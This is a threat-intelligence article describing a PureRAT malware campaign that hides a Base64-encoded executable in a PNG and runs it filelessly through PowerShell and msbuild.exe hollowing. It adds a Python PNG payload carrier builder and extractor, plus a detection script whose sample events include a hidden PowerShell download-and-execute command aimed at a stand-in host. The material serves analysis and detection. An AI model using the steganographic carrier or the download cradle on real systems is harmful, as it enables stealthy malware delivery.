A malware campaign distributing the PureRAT remote access trojan (RAT) has been identified, targeting Windows systems. The campaign is notable for concealing a malicious Portable Executable (PE) payload inside an otherwise ordinary PNG image file and executing it entirely in memory (fileless execution). Because no malicious file is ever written to disk, signature-based controls that scan files are given nothing to match.
Researchers at Trellix documented the campaign, detailing a multi-stage infection chain built for stealth. The attack begins with a malicious .lnk shortcut, a common Windows file type that is easily dressed up to look legitimate. Opening the shortcut runs a hidden PowerShell command that contacts a remote server and retrieves a PNG image. The image is not what it appears to be: it carries a Base64-encoded PE file embedded with steganography, so the payload hides in plain sight.
PureRAT Campaign Employs Fileless Execution via PNG Payloads
The campaign combines image steganography with fileless execution. The initial vector, the malicious .lnk file, triggers a hidden PowerShell script that downloads a PNG image carrying the malicious PE payload. The script carves the payload out of the image, decodes it from Base64 and loads it straight into memory, never writing a recognisable file to disk. This in-memory loading is the core of PureRAT's evasion strategy.
According to Trellix's analysis, the PowerShell second-stage loader is heavily obfuscated: junk data is padded onto both the beginning and the end of the script to frustrate manual analysis and automated tooling. The loader also checks for virtualization environments such as VMware and QEMU and terminates itself if it finds one, so a sandbox that does not hide its hypervisor artefacts will see the script exit without ever producing a payload. Analysts should expect the loader to behave differently, or not at all, inside a VM, and either detonate it on hardware or patch the check out first.
Once running, PureRAT fingerprints the host, collecting installed security software, hardware identifiers and the privilege level of the logged-in user. The final payload is executed through process hollowing: the legitimate, signed msbuild.exe is started and its in-memory image is replaced with the malicious code, so the payload runs under the name of a trusted Windows binary while the file on disk stays unmodified. Process listings and file scans see only msbuild.exe; the substitution is visible only to tooling that compares what is mapped in memory with what is on disk.
Persistence is maintained through a registry-backed scheduled task, so PureRAT re-executes automatically after a reboot. Command and control (C2) communication is established with a dynamic listener, through which the operators dispatch plugins for keylogging, system monitoring and remote desktop access, giving them effectively full control of the compromised machine.
The Advanced Infection Mechanism of PureRAT
The infection mechanism relies on image steganography combined with in-memory payload delivery. After the .lnk file executes, the concealed PowerShell command downloads a PNG image from an attacker-controlled server. The image carries a Base64-encoded PE file hidden within its image data, and the PowerShell script locates the exact start and end offsets of the embedded payload within the file.
After extraction, the script applies a character replacement, reverses the data and only then decodes it from Base64, which defeats a plain Base64 decode of the raw image and any scanner that looks for Base64-encoded MZ headers. The result is converted into a byte array and loaded into the PowerShell process's own memory as a compiled .NET assembly using `System.Reflection.Assembly.Load()`. Nothing is written to disk at this stage, and the later process hollowing leaves the signed msbuild.exe on disk untouched as well, so file-scanning detection has no malicious file to inspect; only monitoring of in-memory loads (for example CLR ETW assembly-load events from a PowerShell process) sees the payload arrive.
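As an added illustration (not code from the Trellix report or from the campaign), the following Python builds a valid PNG with an encoded payload and then recovers it the way the two paragraphs above describe: character replacement, reversal, Base64 decode, then a sanity check that the result is a PE image. The marker strings, the `=` to `!` substitution, placing the payload after the IEND chunk and the minimal fake PE are all assumptions; the real script's index-finding logic and substitution are not on this page. The `bytes_after_iend` check is a triage heuristic an analyst can run over any PNG: a well-formed file has nothing past its terminating chunk.

```python
import base64
import struct
import zlib
from typing import Optional

PNG_SIG = b"\x89PNG\r\n\x1a\n"

# Assumed delimiters and substitution: the campaign's real markers, index logic
# and character swap are not described on the page.
START_MARKER = b"<<PAYLOAD>>"
END_MARKER = b"<</PAYLOAD>>"
SWAP_FROM, SWAP_TO = b"=", b"!"

# Constructed stand-in for a PE: valid MZ header, e_lfanew pointing at "PE\0\0" at 0x40.
FAKE_PE = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40) + b"PE\x00\x00" + b"\x00" * 12


def encode_stage(pe_bytes: bytes) -> bytes:
    """Inverse of the loader: Base64-encode, reverse, then swap '=' for '!'."""
    return base64.b64encode(pe_bytes)[::-1].replace(SWAP_FROM, SWAP_TO)


def decode_stage(blob: bytes) -> bytes:
    """The loader's order: character replacement, reverse, Base64 decode."""
    return base64.b64decode(blob.replace(SWAP_TO, SWAP_FROM)[::-1])


def _chunk(ctype: bytes, data: bytes) -> bytes:
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_png() -> bytes:
    """A valid 1x1 RGB PNG that any image viewer will open."""
    ihdr = _chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0))
    idat = _chunk(b"IDAT", zlib.compress(b"\x00\xff\x00\x00"))  # filter byte + one red pixel
    return PNG_SIG + ihdr + idat + _chunk(b"IEND", b"")


def build_carrier_png(payload: bytes) -> bytes:
    """Append the encoded payload after IEND; decoders stop at IEND, so the image still renders."""
    return build_png() + START_MARKER + encode_stage(payload) + END_MARKER


def bytes_after_iend(png: bytes) -> int:
    """Walk the chunk list; anything past IEND is foreign data (0 for a clean file, -1 if no IEND)."""
    pos = len(PNG_SIG)
    while pos + 8 <= len(png):
        length, ctype = struct.unpack_from(">I4s", png, pos)
        pos += 12 + length  # 4 length + 4 type + data + 4 CRC
        if ctype == b"IEND":
            return len(png) - pos
    return -1


def extract_payload(png: bytes) -> Optional[bytes]:
    """Locate the marker-delimited region and undo the loader's transformations."""
    if not png.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    start = png.find(START_MARKER)
    end = png.find(END_MARKER, start + len(START_MARKER)) if start >= 0 else -1
    if start < 0 or end < 0:
        return None
    return decode_stage(png[start + len(START_MARKER):end])


def looks_like_pe(data: bytes) -> bool:
    """Cheap PE sanity check: MZ magic and the PE signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


if __name__ == "__main__":
    carrier = build_carrier_png(FAKE_PE)
    print("bytes after IEND:", bytes_after_iend(carrier))
    recovered = extract_payload(carrier)
    print("recovered == FAKE_PE:", recovered == FAKE_PE, "looks like PE:", looks_like_pe(recovered))
```

Reading the recovered bytes and handing them to a PE parser, rather than to `Assembly.Load()`, is the analyst's counterpart to what the loader does; the same extractor can be pointed at a real sample once its markers and substitution are known.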
The .NET DLL recovered from the PNG, associated in Trellix's analysis with the name `GeneratedPy.png`, is the next-stage loader and is protected with .NET Reactor obfuscation. Its main job is to run a Triple DES decryption routine; the key and initialization vector are derived from Base64-encoded strings embedded in the file itself, so an analyst who has the loader has everything needed to decrypt the next stage offline without executing it. The decrypted bytes are again executed as a .NET assembly in memory, completing a fully fileless delivery chain.
To mitigate threats like PureRAT, organizations should harden endpoints and instrument memory rather than rely on file scanning. Restrict PowerShell and VBScript execution with AppLocker or Windows Defender Application Control and run PowerShell in Constrained Language Mode; note that the PowerShell execution policy on its own is not a security boundary (it is bypassed with `-ExecutionPolicy Bypass` or by piping script text to the interpreter) and should be paired with Script Block Logging and AMSI so that obfuscated loaders are recorded in the form the engine actually executes. Configure endpoint security to detect in-memory behaviour such as process hollowing and reflective code loading, and monitor and restrict abused built-in Windows binaries such as `cmstp.exe` and `msbuild.exe`, alerting in particular when msbuild.exe is launched by a scripting host, runs without a project file, or opens network connections. Timely patching and user training on recognising suspicious shortcuts and attachments remain essential complements to these controls.
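As an added example (not Trellix's detection content and not code from the campaign), the following Python runs three detection rules over constructed Sysmon-style events that follow the chain described above in the process hollowing and mitigation paragraphs: a hidden PowerShell launched from explorer.exe with a download cue (the .lnk stage), msbuild.exe started by a scripting host or without any project file on its command line (the hollowing target), and msbuild.exe opening an outbound connection. The events, paths and the documentation-range address 203.0.113.10 are constructed; field names follow Sysmon. The parent-process and command-line rules are proxies, since hollowing itself is only visible to memory inspection (a mapped image that no longer matches the file on disk), which an EDR provides and this script does not.

```python
import re
from typing import Dict, List

# Constructed Sysmon-style events (not from the Trellix report). EventID 1 is a
# process creation and EventID 3 a network connection; 203.0.113.10 is a
# documentation-range address used here as a stand-in for a C2 host.
EVENTS: List[Dict[str, str]] = [
    {"EventID": "1",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -w hidden -nop -c \"IEX((New-Object Net.WebClient)"
                    ".DownloadString('http://203.0.113.10/a.png'))\""},
    {"EventID": "1",
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"},
    {"EventID": "3",
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": "4433"},
    # Benign baseline: an IDE-launched build with a project file, and an admin script.
    {"EventID": "1",
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "CommandLine": r'MSBuild.exe "C:\src\app\app.csproj" /t:Build'},
    {"EventID": "1",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden\b|-w\s+h\b", re.I)
DOWNLOAD_RE = re.compile(
    r"DownloadString|DownloadData|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Invoke-RestMethod",
    re.I)
PROJECT_RE = re.compile(r"\.(?:csproj|vbproj|fsproj|proj|sln|targets)\b", re.I)


def _base(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_hidden_download_powershell(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Rule 1: PowerShell spawned by explorer.exe (how a double-clicked .lnk appears)
    with a hidden window and a download cue on the command line."""
    hits = []
    for e in events:
        if e.get("EventID") != "1" or _base(e.get("Image", "")) != "powershell.exe":
            continue
        cl = e.get("CommandLine", "")
        if _base(e.get("ParentImage", "")) == "explorer.exe" and HIDDEN_RE.search(cl) and DOWNLOAD_RE.search(cl):
            hits.append(e)
    return hits


def find_suspicious_msbuild(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Rule 2: msbuild.exe started by a scripting host, or with no project file at all.
    The hollowed image is not visible here; the anomalous launch is the proxy."""
    hits = []
    for e in events:
        if e.get("EventID") != "1" or _base(e.get("Image", "")) != "msbuild.exe":
            continue
        parent = _base(e.get("ParentImage", ""))
        if parent in SCRIPT_HOSTS or not PROJECT_RE.search(e.get("CommandLine", "")):
            hits.append(e)
    return hits


def find_msbuild_network(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Rule 3: a build tool opening outbound network connections."""
    return [e for e in events if e.get("EventID") == "3" and _base(e.get("Image", "")) == "msbuild.exe"]


def run_all(events: List[Dict[str, str]]) -> Dict[str, List[Dict[str, str]]]:
    return {
        "hidden_download_powershell": find_hidden_download_powershell(events),
        "msbuild_no_project_or_script_parent": find_suspicious_msbuild(events),
        "msbuild_network": find_msbuild_network(events),
    }


if __name__ == "__main__":
    for rule, hits in run_all(EVENTS).items():
        print(f"{rule}: {len(hits)} hit(s)")
        for h in hits:
            print("   ", h.get("CommandLine") or f"{h['Image']} -> {h['DestinationIp']}:{h['DestinationPort']}")
```

The benign events are there to show that the rules key on the combination of parent, window state and arguments rather than on msbuild.exe or PowerShell alone; in production the same logic would be expressed as a SIEM or Sigma query over the equivalent Sysmon or EDR telemetry.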